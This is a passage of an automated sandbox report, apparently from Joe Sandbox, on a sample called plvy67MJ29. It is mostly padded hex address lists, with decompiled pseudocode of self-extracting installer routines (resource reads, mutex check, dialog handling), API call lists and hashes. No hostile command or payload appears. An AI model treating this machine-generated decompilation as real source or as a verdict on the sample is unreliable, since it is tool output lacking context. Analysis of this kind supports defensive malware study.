                                                                                                                                                                                                    0x00fd3370
                                                                                                                                                                                                    0x00fd3372
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3372
                                                                                                                                                                                                    0x00fd32fc
                                                                                                                                                                                                    0x00fd3301
                                                                                                                                                                                                    0x00fd3301
                                                                                                                                                                                                    0x00fd3303
                                                                                                                                                                                                    0x00fd3304
                                                                                                                                                                                                    0x00fd3304
                                                                                                                                                                                                    0x00fd330a
                                                                                                                                                                                                    0x00fd330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3313
                                                                                                                                                                                                    0x00fd3318
                                                                                                                                                                                                    0x00fd331a
                                                                                                                                                                                                    0x00fd3331
                                                                                                                                                                                                    0x00fd3332
                                                                                                                                                                                                    0x00fd333a
                                                                                                                                                                                                    0x00fd333d
                                                                                                                                                                                                    0x00fd337c
                                                                                                                                                                                                    0x00fd3388
                                                                                                                                                                                                    0x00fd338f
                                                                                                                                                                                                    0x00fd3394
                                                                                                                                                                                                    0x00fd3396
                                                                                                                                                                                                    0x00fd33a4
                                                                                                                                                                                                    0x00fd33ab
                                                                                                                                                                                                    0x00fd33b6
                                                                                                                                                                                                    0x00fd33be
                                                                                                                                                                                                    0x00fd33c3
                                                                                                                                                                                                    0x00fd33c5
                                                                                                                                                                                                    0x00fd3435
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3437
                                                                                                                                                                                                    0x00fd33c7
                                                                                                                                                                                                    0x00fd33c9
                                                                                                                                                                                                    0x00fd33cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd33cc
                                                                                                                                                                                                    0x00fd33ad
                                                                                                                                                                                                    0x00fd33b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd33b4
                                                                                                                                                                                                    0x00fd3398
                                                                                                                                                                                                    0x00fd3399
                                                                                                                                                                                                    0x00fd339b
                                                                                                                                                                                                    0x00fd339c
                                                                                                                                                                                                    0x00fd339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd339d
                                                                                                                                                                                                    0x00fd334c
                                                                                                                                                                                                    0x00fd3351
                                                                                                                                                                                                    0x00fd3354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd335c
                                                                                                                                                                                                    0x00fd3362
                                                                                                                                                                                                    0x00fd3364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3366
                                                                                                                                                                                                    0x00fd3367
                                                                                                                                                                                                    0x00fd3369
                                                                                                                                                                                                    0x00fd336a
                                                                                                                                                                                                    0x00fd336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd336b
                                                                                                                                                                                                    0x00fd331c
                                                                                                                                                                                                    0x00fd3323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3329
                                                                                                                                                                                                    0x00fd332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd332b
                                                                                                                                                                                                    0x00fd324c
                                                                                                                                                                                                    0x00fd324c
                                                                                                                                                                                                    0x00fd324f
                                                                                                                                                                                                    0x00fd32c8
                                                                                                                                                                                                    0x00fd32ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd32ce
                                                                                                                                                                                                    0x00fd3251
                                                                                                                                                                                                    0x00fd3256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3271
                                                                                                                                                                                                    0x00fd3277
                                                                                                                                                                                                    0x00fd3279
                                                                                                                                                                                                    0x00fd3298
                                                                                                                                                                                                    0x00fd329d
                                                                                                                                                                                                    0x00fd329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd32b0
                                                                                                                                                                                                    0x00fd32b6
                                                                                                                                                                                                    0x00fd32b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd32be
                                                                                                                                                                                                    0x00fd3280
                                                                                                                                                                                                    0x00fd3289
                                                                                                                                                                                                    0x00fd328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd328e
                                                                                                                                                                                                    0x00fd327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00FD8598,00000200), ref: 00FD3271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00FD33E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00FD33F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00FD3410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00FD3426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00FD342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00FD343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-2261383228
                                                                                                                                                                                                    • Opcode ID: 92f72968c784f9d81de769ac5fc7748fd0477d08c71a6618695c17ebb7e08bee
                                                                                                                                                                                                    • Instruction ID: 2b9adf28eb98fde611ccab4a49d74da753fd26547b77ab3b17d8e89fade0e186
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92f72968c784f9d81de769ac5fc7748fd0477d08c71a6618695c17ebb7e08bee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1951483178224577EB21AB755C4CF7B3A4B9B46B61F1C402BF745963C0CAB98A01B267
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00FD2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t13 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                    				 *0xfd9a3c = __ecx;
                                                                                                                                                                                                    				memset(0xfd9140, 0, 0x8fc);
                                                                                                                                                                                                    				memset(0xfd8a20, 0, 0x32c);
                                                                                                                                                                                                    				memset(0xfd88c0, 0, 0x104);
                                                                                                                                                                                                    				 *0xfd93ec = 1;
                                                                                                                                                                                                    				_t20 = E00FD468F("TITLE", 0xfd9154, 0x7f);
                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *0xfd858c = _t27;
                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                    					_t64 = 0xfd9a34;
                                                                                                                                                                                                    					if(E00FD468F("EXTRACTOPT", 0xfd9a34, 4) != 0) {
                                                                                                                                                                                                    						if(( *0xfd9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							 *0xfd9120 =  *0xfd9120 & _t65;
                                                                                                                                                                                                    							if(E00FD5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                    								if( *0xfd8a3a == 0) {
                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0xfd8184 != 0) {
                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0xfd8a24 == 0) {
                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                    										if(E00FD36EE(_t65) == 0) {
                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t33 =  *0xfd9a40; // 0x3
                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                    												if(( *0xfd9a34 & 0x00000100) == 0 || ( *0xfd8a38 & 0x00000001) != 0 || E00FD18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                    													if(E00FD6517(_t57, 0x7d6, _t34, E00FD19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00FD2390(0xfd8a3a);
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								E00FD44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                    							if(E00FD468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                    								 *0xfd8588 = _t43;
                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(( *0xfd9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                    										if(E00FD44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                    										E00FD44B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										CloseHandle( *0xfd8588);
                                                                                                                                                                                                    										 *0xfd9124 = 0x800700b7;
                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00fd2cb5
                                                                                                                                                                                                    0x00fd2cbc
                                                                                                                                                                                                    0x00fd2cc7
                                                                                                                                                                                                    0x00fd2cc9
                                                                                                                                                                                                    0x00fd2cd1
                                                                                                                                                                                                    0x00fd2cd3
                                                                                                                                                                                                    0x00fd2cd9
                                                                                                                                                                                                    0x00fd2ce9
                                                                                                                                                                                                    0x00fd2cf9
                                                                                                                                                                                                    0x00fd2d0e
                                                                                                                                                                                                    0x00fd2d15
                                                                                                                                                                                                    0x00fd2d1c
                                                                                                                                                                                                    0x00fd2ef3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2d2d
                                                                                                                                                                                                    0x00fd2d34
                                                                                                                                                                                                    0x00fd2d3b
                                                                                                                                                                                                    0x00fd2d40
                                                                                                                                                                                                    0x00fd2d48
                                                                                                                                                                                                    0x00fd2d59
                                                                                                                                                                                                    0x00fd2d84
                                                                                                                                                                                                    0x00fd2e1f
                                                                                                                                                                                                    0x00fd2e1f
                                                                                                                                                                                                    0x00fd2e2e
                                                                                                                                                                                                    0x00fd2e41
                                                                                                                                                                                                    0x00fd2e5a
                                                                                                                                                                                                    0x00fd2e62
                                                                                                                                                                                                    0x00fd2e6c
                                                                                                                                                                                                    0x00fd2e6c
                                                                                                                                                                                                    0x00fd2e75
                                                                                                                                                                                                    0x00fd2e77
                                                                                                                                                                                                    0x00fd2e77
                                                                                                                                                                                                    0x00fd2e84
                                                                                                                                                                                                    0x00fd2e8b
                                                                                                                                                                                                    0x00fd2e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2e96
                                                                                                                                                                                                    0x00fd2e96
                                                                                                                                                                                                    0x00fd2e9e
                                                                                                                                                                                                    0x00fd2ea2
                                                                                                                                                                                                    0x00fd2eba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2ece
                                                                                                                                                                                                    0x00fd2ede
                                                                                                                                                                                                    0x00fd2eed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2eed
                                                                                                                                                                                                    0x00fd2eef
                                                                                                                                                                                                    0x00fd2eef
                                                                                                                                                                                                    0x00fd2eef
                                                                                                                                                                                                    0x00fd2eef
                                                                                                                                                                                                    0x00fd2ea2
                                                                                                                                                                                                    0x00fd2e86
                                                                                                                                                                                                    0x00fd2e88
                                                                                                                                                                                                    0x00fd2e88
                                                                                                                                                                                                    0x00fd2e43
                                                                                                                                                                                                    0x00fd2e48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2e48
                                                                                                                                                                                                    0x00fd2e30
                                                                                                                                                                                                    0x00fd2e30
                                                                                                                                                                                                    0x00fd2ef8
                                                                                                                                                                                                    0x00fd2f01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2f01
                                                                                                                                                                                                    0x00fd2d8a
                                                                                                                                                                                                    0x00fd2d8f
                                                                                                                                                                                                    0x00fd2da1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2da3
                                                                                                                                                                                                    0x00fd2dae
                                                                                                                                                                                                    0x00fd2db4
                                                                                                                                                                                                    0x00fd2dbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2dca
                                                                                                                                                                                                    0x00fd2dd3
                                                                                                                                                                                                    0x00fd2df5
                                                                                                                                                                                                    0x00fd2e02
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2dd5
                                                                                                                                                                                                    0x00fd2dde
                                                                                                                                                                                                    0x00fd2de3
                                                                                                                                                                                                    0x00fd2e04
                                                                                                                                                                                                    0x00fd2e0a
                                                                                                                                                                                                    0x00fd2e10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2e10
                                                                                                                                                                                                    0x00fd2dd3
                                                                                                                                                                                                    0x00fd2dbb
                                                                                                                                                                                                    0x00fd2da1
                                                                                                                                                                                                    0x00fd2d5b
                                                                                                                                                                                                    0x00fd2d5b
                                                                                                                                                                                                    0x00fd2d5d
                                                                                                                                                                                                    0x00fd2d69
                                                                                                                                                                                                    0x00fd2d6e
                                                                                                                                                                                                    0x00fd2f06
                                                                                                                                                                                                    0x00fd2f06
                                                                                                                                                                                                    0x00fd2f06
                                                                                                                                                                                                    0x00fd2d59
                                                                                                                                                                                                    0x00fd2f18

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD2CD9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD2CE9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD2CF9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2D34
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2D40
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2DAE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2DBD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD2E0A
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
                                                                                                                                                                                                    • API String ID: 1002816675-1021407552
                                                                                                                                                                                                    • Opcode ID: e08fde0187631023c6d292991728c43010230e686c0d855b2a67107e9652f369
                                                                                                                                                                                                    • Instruction ID: d930bd60a2f1086178eae613ef748856dad270488fa9511672b207470846cdc5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e08fde0187631023c6d292991728c43010230e686c0d855b2a67107e9652f369
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 585126717053056BE7A0B7B09C4AB3A339BEB61710F0C402BB941C53D1DAB88841FA96
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                    			E00FD34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				struct HWND__* _t35;
                                                                                                                                                                                                    				struct HWND__* _t38;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t9 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *0xfd91d8 = 1;
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                    					EndDialog();
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				_pop(1);
                                                                                                                                                                                                    				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                    				if(_t12 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                    					if(_a12 != 0x1b) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t13 = _t12 - 0xe;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t35 = _a4;
                                                                                                                                                                                                    					 *0xfd8584 = _t35;
                                                                                                                                                                                                    					E00FD43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                    					__eflags =  *0xfd8184; // 0x1
                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetWindowTextA(_t35, "nst0dum");
                                                                                                                                                                                                    					_t17 = CreateThread(0, 0, E00FD4FE0, 0, 0, 0xfd8798);
                                                                                                                                                                                                    					 *0xfd879c = _t17;
                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						E00FD44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					ResetEvent( *0xfd858c);
                                                                                                                                                                                                    					_t38 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    					_t25 = E00FD44B9(_t38, 0x4b2, 0xfd1140, 0, 0x20, 4);
                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						 *0xfd91d8 = 1;
                                                                                                                                                                                                    						SetEvent( *0xfd858c);
                                                                                                                                                                                                    						_t39 =  *0xfd879c; // 0x0
                                                                                                                                                                                                    						E00FD3680(_t39);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *0xfd858c);
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                    					TerminateThread( *0xfd879c, 0);
                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00fd34fb
                                                                                                                                                                                                    0x00fd34fe
                                                                                                                                                                                                    0x00fd3665
                                                                                                                                                                                                    0x00fd3666
                                                                                                                                                                                                    0x00fd3666
                                                                                                                                                                                                    0x00fd3668
                                                                                                                                                                                                    0x00fd366e
                                                                                                                                                                                                    0x00fd366e
                                                                                                                                                                                                    0x00fd3671
                                                                                                                                                                                                    0x00fd3671
                                                                                                                                                                                                    0x00fd3677
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3677
                                                                                                                                                                                                    0x00fd3504
                                                                                                                                                                                                    0x00fd3506
                                                                                                                                                                                                    0x00fd3507
                                                                                                                                                                                                    0x00fd350c
                                                                                                                                                                                                    0x00fd365b
                                                                                                                                                                                                    0x00fd365f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3661
                                                                                                                                                                                                    0x00fd3512
                                                                                                                                                                                                    0x00fd3515
                                                                                                                                                                                                    0x00fd35be
                                                                                                                                                                                                    0x00fd35c1
                                                                                                                                                                                                    0x00fd35d1
                                                                                                                                                                                                    0x00fd35d8
                                                                                                                                                                                                    0x00fd35de
                                                                                                                                                                                                    0x00fd35f8
                                                                                                                                                                                                    0x00fd3617
                                                                                                                                                                                                    0x00fd3617
                                                                                                                                                                                                    0x00fd3623
                                                                                                                                                                                                    0x00fd3637
                                                                                                                                                                                                    0x00fd363d
                                                                                                                                                                                                    0x00fd3642
                                                                                                                                                                                                    0x00fd3644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3646
                                                                                                                                                                                                    0x00fd3652
                                                                                                                                                                                                    0x00fd3657
                                                                                                                                                                                                    0x00fd3658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3658
                                                                                                                                                                                                    0x00fd3644
                                                                                                                                                                                                    0x00fd351b
                                                                                                                                                                                                    0x00fd351d
                                                                                                                                                                                                    0x00fd354f
                                                                                                                                                                                                    0x00fd3553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd355f
                                                                                                                                                                                                    0x00fd3565
                                                                                                                                                                                                    0x00fd357c
                                                                                                                                                                                                    0x00fd3581
                                                                                                                                                                                                    0x00fd3584
                                                                                                                                                                                                    0x00fd359b
                                                                                                                                                                                                    0x00fd35a1
